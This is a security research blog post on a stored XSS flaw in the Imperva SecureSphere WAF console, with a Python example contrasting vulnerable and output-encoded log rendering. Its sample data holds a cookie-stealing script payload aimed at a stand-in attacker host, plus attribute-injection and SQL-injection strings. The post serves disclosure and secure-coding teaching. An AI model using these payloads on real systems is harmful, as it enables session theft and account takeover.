Imperva SecureSphere XSS and the nature of security-product vulnerabilities
By: Counter Threat Unit Research Team
Earlier today, Imperva publicly announced a vulnerability in their flagship SecureSphere WAF (Web Application Firewall). This issue was discovered by Sean Talbot of Dell SecureWorks and disclosed in a coordinated fashion with Imperva. We thank Imperva for their timely confirmation of our findings and the rapid deployment of patches to address the issue. Affected users are advised to patch their systems as soon as feasible. Details of the vulnerability and information regarding patches are available in our SWRX-2011-001 advisory and in Imperva's announcement.
To summarize: when an Imperva SecureSphere WAF is confronted with malicious traffic, it logs an event recording the details of the attack, including the attacker-supplied request data, to its internal database. In some cases the contents of these events are not properly encoded when they are later displayed in the SecureSphere administrative GUI. An attempted Cross-Site Scripting (XSS) attack against a protected web application, which the WAF detects and records, can therefore be escalated into a live persistent XSS attack against the administrator who reviews the log. Script running in an administrator's browser session can do anything that administrator can: create accounts, view or delete sensitive logs, or completely disable WAF protections.
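To make the flaw class concrete, the following is an added example written for this post; it is not Imperva's code, and the event records, field names and template are constructed for illustration. It models the smallest possible "blocked-attack log viewer": one renderer that interpolates stored event fields straight into HTML (the bug the advisory describes) beside one that HTML-encodes every attacker-controlled field at display time, plus a regression check that flags any markup reaching the page from event data.

```python
import html
import re

# Constructed sample events, shaped like what a WAF might record after
# blocking a request. The "value" fields are the attacker-controlled bytes
# that a log viewer must not replay as live markup. Hypothetical data.
SAMPLE_EVENTS = [
    {"src": "203.0.113.7", "path": "/search", "param": "q",
     "value": "<script>new Image().src='https://attacker.example/?c='+document.cookie</script>"},
    {"src": "198.51.100.9", "path": "/login", "param": "user",
     "value": "\" onmouseover=\"alert(document.domain)"},
    {"src": "192.0.2.44", "path": "/item", "param": "id",
     "value": "1' OR '1'='1"},
]

FIELDS = ("src", "path", "param", "value")


def render_row_vulnerable(event):
    """One log row, interpolated with no output encoding.

    This is the flaw class the advisory describes: the blocked payload is
    rendered verbatim into the administrator's browser, turning a failed
    XSS attempt against the protected site into a stored XSS against the
    management console.
    """
    return "<tr>" + "".join(f"<td>{event[k]}</td>" for k in FIELDS) + "</tr>"


def render_row_safe(event):
    """Same row, with every attacker-controlled field HTML-escaped at the
    point of display. quote=True also encodes ' and ", so the value stays
    inert inside a quoted attribute as well as in element content.
    """
    return "<tr>" + "".join(
        f"<td>{html.escape(str(event[k]), quote=True)}</td>" for k in FIELDS
    ) + "</tr>"


def render_log(events, row_renderer):
    """Assemble the admin log page from the stored events.

    Events are kept byte-exact in storage (forensic value) and encoded only
    when rendered, so the choice of row_renderer is the whole security story.
    """
    rows = "".join(row_renderer(e) for e in events)
    return f"<table>{rows}</table>"


# Regression check: remove the template's own tags. Any angle bracket that
# survives came from event data, i.e. attacker input reached the page as markup.
_TEMPLATE_TAGS = re.compile(r"</?(?:table|tr|td)>")


def leaks_markup(page):
    residue = _TEMPLATE_TAGS.sub("", page)
    return "<" in residue or ">" in residue


if __name__ == "__main__":
    vuln = render_log(SAMPLE_EVENTS, render_row_vulnerable)
    safe = render_log(SAMPLE_EVENTS, render_row_safe)
    print("vulnerable viewer leaks markup:", leaks_markup(vuln))
    print("escaped viewer leaks markup:   ", leaks_markup(safe))
    print(safe)
```

Two design points matter here. First, encoding belongs at the output layer, not at ingestion: the stored event must remain an exact copy of what the attacker sent, both for forensics and because the right encoding depends on where the value lands (element text, attribute, JavaScript, URL). `html.escape` covers the first two contexts only; a value written into a script block or an `href` needs context-specific encoding, and a Content-Security-Policy on the console is worthwhile defense in depth. Second, the `leaks_markup` check is deliberately template-specific; its value is as a unit test that fails the moment someone reintroduces raw interpolation of a logged field.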
While the thought of a security system introducing vulnerabilities into the network it is meant to protect is concerning, Imperva is far from alone in facing this issue. The industry-wide trend is toward deeper and more complex inspection of traffic by intermediate devices, be they WAFs, IDS/IPS (Intrusion Detection and Prevention Systems), DPI (Deep Packet Inspection) engines, firewalls, and so on. Deeper inspection means more parsing of attacker-controlled data, and with it a greater likelihood of flaws that compromise the inspecting system itself. Most research into the vulnerabilities of security devices and applications focuses on bypassing their protections, but there has also been research into directly exploiting their flaws. At Black Hat USA 2010, I had the honor of co-presenting with Ben Feinstein and Dan King on similar issues affecting Cisco ASA and McAfee's Network Security Manager. Others in the security industry, including Dan Kaminsky, have noted similar attacks against Deep Packet Inspection (DPI) and Application Layer Gateway (ALG) devices. NSS Labs' recent disclosure of the TCP Split Handshake attack further demonstrates the problem of intermediate inspection logic gone awry.
This latest flaw in SecureSphere further underscores the need to evaluate the security of security systems themselves. Any reasonably complex system is likely to have flaws, and security systems are no exception. No system is perfect, but the trusted, privileged position of a security system warrants an especially high level of scrutiny. Imperva should be applauded for their response, but this vulnerability highlights the difficult issues that arise when attempting to protect a complex system by introducing still more complexity.
- http://www.imperva.com/resources/adc/adc_advisories_response_secureworks.html
- https://www.secureworks.com/research/swrx-2011-001
- https://www.blackhat.com/html/bh-us-10/bh-us-10-archives.html#Feinstein
- http://s3.amazonaws.com/dmk/Staring Into The Abyss.pdf
- http://www.nsslabs.com/research/analysis-briefs/network-firewall-remediation-for-tcp-split-handshake.html